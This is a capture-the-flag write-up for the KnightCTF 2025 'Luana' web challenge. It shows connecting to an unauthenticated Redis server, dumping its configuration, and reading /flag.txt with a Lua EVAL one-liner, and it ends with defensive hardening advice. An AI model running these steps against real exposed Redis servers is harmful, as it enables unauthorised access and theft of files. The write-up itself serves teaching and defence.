Tags: web 


Name: Luana
Description:
Show me your skills. Read the /flag.txt

Flag Format: KCTF{Fl4G_HeRe}

Do not use any automation tools. The server will reset in every 5 minutes.

Open the challenge URL:

![image](https://github.com/user-attachments/assets/54f13754-7a22-41fa-88e5-7216c443196f)

Find the port of the exposed service (6379, the Redis default), then connect to it with `redis-cli`:

```
redis-cli -h 172.105.121.246 -p 6379
```

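Then run `INFO` and `CONFIG GET *` to fingerprint the server. Both commands are accepted without `AUTH`, so the instance is unauthenticated: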

```
└─$ redis-cli -h 172.105.121.246 -p 6379
172.105.121.246:6379> info
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:636cde3b5c7a3923
redis_mode:standalone
os:Linux 6.8.0-51-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.2.1
process_id:7
run_id:2b0cf4f1beef91d6681523e033e5a79306c41f1c
tcp_port:6379
uptime_in_seconds:51
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:9377902
executable:/tmp/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:5
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:943144
used_memory_human:921.04K
used_memory_rss:7684096
used_memory_rss_human:7.33M
used_memory_peak:943144
used_memory_peak_human:921.04K
used_memory_peak_perc:100.11%
used_memory_overhead:914934
used_memory_startup:797224
used_memory_dataset:28210
used_memory_dataset_perc:19.33%
allocator_allocated:1636440
allocator_active:1937408
allocator_resident:10731520
total_system_memory:1008324608
total_system_memory_human:961.61M
used_memory_lua:52224
used_memory_lua_human:51.00K
used_memory_scripts:328
used_memory_scripts_human:328B
number_of_cached_scripts:1
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.18
allocator_frag_bytes:300968
allocator_rss_ratio:5.54
allocator_rss_bytes:8794112
rss_overhead_ratio:0.72
rss_overhead_bytes:-3047424
mem_fragmentation_ratio:8.53
mem_fragmentation_bytes:6782960
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:117382
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1737431099
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:5
total_commands_processed:16
instantaneous_ops_per_sec:0
total_net_input_bytes:690
total_net_output_bytes:57754
instantaneous_input_kbps:0.03
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:e0908287556b3396dc3978afa770e85ab238791f
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.052646
used_cpu_user:0.036253
used_cpu_sys_children:0.001432
used_cpu_user_children:0.000858

# Cluster
cluster_enabled:0

# Keyspace
172.105.121.246:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
10) ""
11) "logfile"
12) "/dev/stdout"
13) "pidfile"
14) "/var/run/redis/redis-server.pid"
15) "slave-announce-ip"
16) ""
17) "replica-announce-ip"
18) ""
19) "maxmemory"
20) "0"
21) "proto-max-bulk-len"
22) "536870912"
23) "client-query-buffer-limit"
24) "1073741824"
25) "maxmemory-samples"
26) "5"
27) "lfu-log-factor"
28) "10"
29) "lfu-decay-time"
30) "1"
31) "timeout"
32) "0"
33) "active-defrag-threshold-lower"
34) "10"
35) "active-defrag-threshold-upper"
36) "100"
37) "active-defrag-ignore-bytes"
38) "104857600"
39) "active-defrag-cycle-min"
40) "5"
41) "active-defrag-cycle-max"
42) "75"
43) "active-defrag-max-scan-fields"
44) "1000"
45) "auto-aof-rewrite-percentage"
46) "100"
47) "auto-aof-rewrite-min-size"
48) "67108864"
49) "hash-max-ziplist-entries"
50) "512"
51) "hash-max-ziplist-value"
52) "64"
53) "stream-node-max-bytes"
54) "4096"
55) "stream-node-max-entries"
56) "100"
57) "list-max-ziplist-size"
58) "-2"
59) "list-compress-depth"
60) "0"
61) "set-max-intset-entries"
62) "512"
63) "zset-max-ziplist-entries"
64) "128"
65) "zset-max-ziplist-value"
66) "64"
67) "hll-sparse-max-bytes"
68) "3000"
69) "lua-time-limit"
70) "5000"
71) "slowlog-log-slower-than"
72) "10000"
73) "latency-monitor-threshold"
74) "0"
75) "slowlog-max-len"
76) "128"
77) "port"
78) "6379"
79) "cluster-announce-port"
80) "0"
81) "cluster-announce-bus-port"
82) "0"
83) "tcp-backlog"
84) "511"
85) "databases"
86) "16"
87) "repl-ping-slave-period"
88) "10"
89) "repl-ping-replica-period"
90) "10"
91) "repl-timeout"
92) "60"
93) "repl-backlog-size"
94) "1048576"
95) "repl-backlog-ttl"
96) "3600"
97) "maxclients"
98) "10000"
99) "watchdog-period"
100) "0"
101) "slave-priority"
102) "100"
103) "replica-priority"
104) "100"
105) "slave-announce-port"
106) "0"
107) "replica-announce-port"
108) "0"
109) "min-slaves-to-write"
110) "0"
111) "min-replicas-to-write"
112) "0"
113) "min-slaves-max-lag"
114) "10"
115) "min-replicas-max-lag"
116) "10"
117) "hz"
118) "10"
119) "cluster-node-timeout"
120) "15000"
121) "cluster-migration-barrier"
122) "1"
123) "cluster-slave-validity-factor"
124) "10"
125) "cluster-replica-validity-factor"
126) "10"
127) "repl-diskless-sync-delay"
128) "5"
129) "tcp-keepalive"
130) "300"
131) "cluster-require-full-coverage"
132) "yes"
133) "cluster-slave-no-failover"
134) "no"
135) "cluster-replica-no-failover"
136) "no"
137) "no-appendfsync-on-rewrite"
138) "no"
139) "slave-serve-stale-data"
140) "yes"
141) "replica-serve-stale-data"
142) "yes"
143) "slave-read-only"
144) "yes"
145) "replica-read-only"
146) "yes"
147) "slave-ignore-maxmemory"
148) "yes"
149) "replica-ignore-maxmemory"
150) "yes"
151) "stop-writes-on-bgsave-error"
152) "yes"
153) "daemonize"
154) "no"
155) "rdbcompression"
156) "yes"
157) "rdbchecksum"
158) "yes"
159) "activerehashing"
160) "yes"
161) "activedefrag"
162) "no"
163) "protected-mode"
164) "no"
165) "repl-disable-tcp-nodelay"
166) "no"
167) "repl-diskless-sync"
168) "no"
169) "aof-rewrite-incremental-fsync"
170) "yes"
171) "rdb-save-incremental-fsync"
172) "yes"
173) "aof-load-truncated"
174) "yes"
175) "aof-use-rdb-preamble"
176) "yes"
177) "lazyfree-lazy-eviction"
178) "no"
179) "lazyfree-lazy-expire"
180) "no"
181) "lazyfree-lazy-server-del"
182) "no"
183) "slave-lazy-flush"
184) "no"
185) "replica-lazy-flush"
186) "no"
187) "dynamic-hz"
188) "yes"
189) "maxmemory-policy"
190) "noeviction"
191) "loglevel"
192) "notice"
193) "supervised"
194) "no"
195) "appendfsync"
196) "everysec"
197) "syslog-facility"
198) "local0"
199) "appendonly"
200) "no"
201) "dir"
202) "/root"
203) "save"
204) "900 1 300 10 60 10000"
205) "client-output-buffer-limit"
206) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
207) "unixsocketperm"
208) "0"
209) "slaveof"
210) ""
211) "notify-keyspace-events"
212) ""
213) "bind"
214) "0.0.0.0"
172.105.121.246:6379>
```
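The configuration output shows why the server is reachable by anyone: `requirepass` is empty, `protected-mode` is `no`, and `bind` is `0.0.0.0`. Since `EVAL` is available, try to read `/flag.txt` from a Lua script. Stock Redis does not expose Lua's `io` library to scripts, so this works only because the challenge server (note `executable:/tmp/redis-server`) apparently runs with a weakened Lua sandbox: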
```
EVAL "local f=io.open('/flag.txt', 'r'); local c=f:read('*a'); f:close(); return c" 0
```

![image](https://github.com/user-attachments/assets/64c0bd57-f8db-47d3-9f1b-8431eea07ddd)

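Done: the script returns the contents of `/flag.txt`. On the defender's side, the fixes are the settings shown above: set `requirepass` (or ACLs on Redis 6 and later), keep `protected-mode` enabled, bind to a private interface instead of `0.0.0.0`, and run Redis as an unprivileged user (`dir` being `/root` suggests this one runs as root).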

Original writeup (https://github.com/rxx2me/CTFs-Writeups/blob/main/KnightCTF%202025/web/Luana/README.md).